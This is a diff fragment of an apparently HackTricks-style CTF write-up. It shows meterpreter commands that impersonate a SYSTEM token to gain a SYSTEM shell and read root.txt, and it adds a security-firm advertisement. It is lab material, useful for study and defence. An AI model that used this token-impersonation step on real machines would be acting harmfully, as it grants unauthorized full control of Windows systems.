@ -88,7 +94,7 @@ NT AUTHORITY\SYSTEM
We need to quickly impersonate the token or it will disappear. We need to quickly impersonate the token or it will disappear.
```text ```
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable [-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
Call rev2self if primary process token is SYSTEM Call rev2self if primary process token is SYSTEM
@ -100,7 +106,12 @@ Server username: NT AUTHORITY\SYSTEM
Success! We have our SYSTEM shell and can grab the root.txt file! Success! We have our SYSTEM shell and can grab the root.txt file!
{% hint style="danger" %}
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
{% embed url="https://securityboat.in/contact-us" %}
{% endhint %}
<details> <details>
@ -117,5 +128,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>